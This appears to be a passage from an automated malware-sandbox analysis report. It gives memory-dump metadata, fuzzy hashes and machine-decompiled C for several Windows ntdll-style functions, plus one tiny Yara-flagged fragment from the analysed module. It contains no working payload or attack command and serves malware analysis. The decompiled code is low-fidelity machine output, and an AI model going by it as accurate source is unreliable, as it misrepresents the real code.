0x04b10624
0x04b10625
0x04b10627
0x04b10628
0x04b10631
0x04b10640
0x04b1064d
0x04b10654
0x04b10654
0x04b10631
0x04b1066d
0x04b10674
0x00000000
0x00000000
0x04b10692
0x04b1069e
0x04b106b0
0x04b106a0
0x04b106a9
0x04b106a9
0x04b106b8
0x04b106d6
0x04b106d6
0x00000000

Strings

`, xrefs: 04B10633

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 277297802c340ac4af1412cd6b62ea3436f27d4cc5892927cdb35eec36447385
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 8231F132304305ABE720EE24CD84F9B7BD9EB84758F044269FA58EB6D0E670F944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04AC3884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04AC3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04A89650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04A64620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04A89650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x04ac3893
0x04ac3896
0x04ac3899
0x04ac389f
0x04ac38a0
0x04ac38a4
0x04ac38a9
0x04ac38ac
0x04ac38ad
0x04ac38ae
0x04ac38af
0x04ac38b1
0x04ac38b4
0x04ac38bb
0x04ac38bc
0x04ac38bd
0x04ac38c4
0x04ac38c8
0x04ac38ca
0x04ac38ca
0x04ac38d5
0x04ac393e
0x04ac3940
0x04ac3942
0x04ac3952
0x04ac3954
0x04ac3961
0x04ac3961
0x04ac3967
0x04ac396e
0x04ac396e
0x04ac3947
0x04ac394c
0x00000000
0x04ac394c
0x04ac38ea
0x04ac38ee
0x04ac38f8
0x04ac38f9
0x04ac38ff
0x04ac3900
0x04ac3902
0x04ac3903
0x04ac390b
0x04ac390f
0x04ac3950
0x00000000
0x04ac3950
0x04ac3915
0x04ac391d
0x04ac391d
0x04ac3922
0x04ac3926
0x00000000
0x04ac3928
0x04ac392b
0x04ac392b
0x04ac3935
0x04ac3937
0x04ac3937
0x00000000
0x04ac3935
0x04ac3926
0x04ac38f0
0x00000000

Strings

BinaryName, xrefs: 04AC38B4

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 007c399bd444ecfa5066fb3929b013f0d5a718caefe887877d433c6049a0f931
Instruction ID: 16c1f227dbd5ff15772c27011a5dcb16c58f89e7989c3ff4e9201d88e9e14365
Opcode Fuzzy Hash: 007c399bd444ecfa5066fb3929b013f0d5a718caefe887877d433c6049a0f931
Instruction Fuzzy Hash: F8312F7690150AEFEF65DB59C951EBFB778EB80B20F01812DED15A7680D630BE00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A7D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E04A7D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4b3d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04A64120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04A8B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04A898D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04A895D0();
					L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x04a7d29c
0x04a7d2a6
0x04a7d2b1
0x04a7d2b5
0x04a7d2b6
0x04a7d2bc
0x04a7d2bd
0x04a7d2be
0x04a7d2bf
0x04a7d2c2
0x04a7d2c4
0x04a7d2cc
0x04a7d384
0x04a7d34b
0x04a7d34f
0x04a7d350
0x04a7d351
0x04a7d35c
0x04a7d35c
0x04a7d2d6
0x04a7d2da
0x04a7d2e1
0x04a7d361
0x04a7d369
0x04a7d36d
0x04a7d2e3
0x04a7d2e3
0x04a7d2e3
0x04a7d2e5
0x04a7d2ed
0x04a7d2f5
0x04a7d2fa
0x04a7d302
0x04a7d303
0x04a7d30b
0x04a7d30f
0x04a7d313
0x04a7d318
0x04a7d31c
0x04a7d320
0x04a7d379
0x04a7d37d
0x00000000
0x00000000
0x04abaffe
0x04abb001
0x04abb011
0x00000000
0x04a7d322
0x04a7d322
0x04a7d330
0x04a7d337
0x04a7d35d
0x04a7d339
0x04a7d33f
0x04a7d38c
0x04a7d38c
0x04a7d33f
0x04a7d349
0x00000000
0x04a7d349

Strings

@, xrefs: 04A7D303

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c41fc4e1e084643922c0dd842822d2b94f83e3b80004062c31ef8d1af2006916
Instruction ID: cc040ae7554784ff63b542bed96ef6e2896d60f5db141d8b788c1f507abe5223
Opcode Fuzzy Hash: c41fc4e1e084643922c0dd842822d2b94f83e3b80004062c31ef8d1af2006916
Instruction Fuzzy Hash: 273193B56083059FD321DF28C9809ABBBF8EF85754F00092EF99593250E738ED04DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04A51B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04A51B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E04A8BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E04A8A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E04A8A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04A64620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x04a51b8f
0x04a51b9a
0x04a51b9c
0x04a51b9e
0x04a51ba3
0x04aa7010
0x04aa7010
0x00000000
0x04a51ba9
0x04a51ba9
0x04a51bae
0x00000000
0x04a51bc5
0x04a51bca
0x04a51bcf
0x04a51bd0
0x04a51bd1
0x04a51bd2
0x04a51bd6
0x04a51bdc
0x04a51be0
0x04aa6ffc
0x04aa7000
0x00000000
0x04aa7006
0x04aa7009
0x04aa7009
0x04a51be6
0x04a51bec
0x04a51c0b
0x04a51c0b
0x04a51c0c
0x04a51c11
0x04a51c12
0x04a51c15
0x04a51c1b
0x04a51c1f
0x04a51c31
0x04a51c33
0x04aa7026
0x04aa7026
0x04a51c21
0x04a51c24
0x04a51c24
0x04a51bee
0x04a51bee
0x04a51bf2
0x04a51c3a
0x04a51bf4
0x04a51bf4
0x04a51c05
0x04a51c05
0x04a51c09
0x04a51c3e
0x00000000
0x00000000
0x00000000
0x04a51c09
0x04a51bec
0x04a51be0
0x04a51bae
0x04a51c2e

Strings

WindowsExcludedProcs, xrefs: 04A51BC5

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: c9409ac7e9bdd89830e77041b802ff3509400856d4a1bbfa9c70eb356fae9e9c
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 2F21F57BA00228ABEB219F95CA40F6BB7BDEF41B50F054425FD049B210E635FD10D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04A6F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A6F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x04a6f71d
0x04a6f722
0x04a6f726
0x04ab4770
0x04a6f765
0x04a6f769
0x04a6f769
0x04a6f732
0x04ab477a
0x00000000
0x04ab477a
0x04a6f738
0x04a6f73a
0x04a6f73c
0x04a6f73f
0x04a6f746
0x04a6f778
0x04a6f7a9
0x04a6f7a9
0x04a6f754
0x04a6f75a
0x04a6f75d
0x04a6f75f
0x04a6f761
0x04a6f76f
0x04a6f771
0x04a6f771
0x04a6f76f
0x04a6f763
0x00000000
0x04a6f763
0x04a6f77d
0x04a6f7a3
0x04a6f7a5
0x00000000
0x04a6f7a5
0x04a6f77f
0x04a6f782
0x04a6f784
0x04a6f786
0x00000000
0x00000000
0x00000000
0x04a6f788
0x04a6f748
0x04a6f74d
0x04a6f78d
0x04a6f793
0x04a6f7b7
0x04a6f7bc
0x00000000
0x04a6f7bc
0x04a6f798
0x00000000
0x00000000
0x04a6f79d
0x04a6f7b0
0x00000000
0x04a6f7b0
0x04a6f79f
0x00000000
0x04a6f74f
0x04a6f74f
0x00000000
0x04a6f74f

Strings

Actx , xrefs: 04A6F73F

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 0c9c99a4f5c481753e93c78baf30ee54860f0f63499a5f74ecfb6c33c10a43fc
Instruction ID: 06963f45339bfc70a7a229925c83c1bebb11ce4e74966010c7ee20a4545e5e5e
Opcode Fuzzy Hash: 0c9c99a4f5c481753e93c78baf30ee54860f0f63499a5f74ecfb6c33c10a43fc
Instruction Fuzzy Hash: 6711B2F57046028FEB244F1DA99177672A9FB95724F24453AF863CB391EB70F8409340

Uniqueness

Uniqueness Score: -1.00%

Function 04AF8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04AF8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4b20d50);
				E04A9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04AD5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04A9DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04A9DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04A9D130(_t34, _t39, _t40);
			}

0x04af8df1
0x04af8df1
0x04af8df1
0x04af8df1
0x04af8df1
0x04af8df1
0x04af8df3
0x04af8df8
0x04af8dfd
0x04af8e00
0x04af8e0e
0x04af8e2a
0x04af8e36
0x04af8e38
0x04af8e3c
0x04af8e46
0x04af8e46
0x04af8e36
0x04af8e50
0x04af8e56
0x04af8e59
0x04af8e5c
0x04af8e60
0x04af8e67
0x04af8e6d
0x04af8e73
0x04af8e74
0x04af8eb1
0x04af8ebd

Strings

Critical error detected %lx, xrefs: 04AF8E21

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: d3a4754c61d1ed91adbc3f3c79c642e41445a9b374bb9a2cd7f64db8c3a47f45
Instruction ID: 5a9566abe6b6f5c09d7aaa8e67f2564f50447bcaa4bb45d002f569aa3867c955
Opcode Fuzzy Hash: d3a4754c61d1ed91adbc3f3c79c642e41445a9b374bb9a2cd7f64db8c3a47f45
Instruction Fuzzy Hash: 23115775D11348EAEF24DFA8CA0579CBBF0BB04714F20425DE529AB291D3346A01CF14

Uniqueness

Uniqueness Score: -1.00%

Function 04ADFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04ADFF60

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: bbe9d5e58747f062814a2198f9e096108d7f02ba42d108250ebefb04f334f2fd
Instruction ID: 0b76860d3f79bfa09a45d3d00e4ebd0217c88c4f9385cbbac471e1a863d4a498
Opcode Fuzzy Hash: bbe9d5e58747f062814a2198f9e096108d7f02ba42d108250ebefb04f334f2fd
Instruction Fuzzy Hash: F5118E72910144AFEB26DF50CA49B99B7B1FB08709F148494F50A671A1C739B980CB60

Uniqueness

Uniqueness Score: -1.00%

Function 72486AB4, Relevance: 1.3, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E72486AB4(void* __eax) {

				asm("in al, dx");
				asm("aas");
				 *0xFFFFFFFFF7C780BE =  *((intOrPtr*)(0xfffffffff7c780be)) - 0x52e6e0e1;
				return 1;
			}

0x72486ab8
0x72486abe
0x72486abf
0x72486ad4

Strings

R, xrefs: 72486AB9

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID: R
API String ID: 0-2642297125
Opcode ID: 2278e67bf43bd818c6f2fa5895c314b77eb1bcf58da59b0d59c84a0ad08b4bee
Instruction ID: 680190e1dd8b329c35684973fcef62e2d46ab1220294e579f50d3a7fc02c05f0
Opcode Fuzzy Hash: 2278e67bf43bd818c6f2fa5895c314b77eb1bcf58da59b0d59c84a0ad08b4bee
Instruction Fuzzy Hash: 44C01232D4904009D168892D78555F4F7688B67114F1413DF9809D714594439441D148

Uniqueness

Uniqueness Score: -1.00%

Function 04B15BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04B15BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4b21178);
				E04A9D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04B14C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04A8D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04B15542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4b360e8;
								if( *0x4b360e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4b360e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04A89710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04A86DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
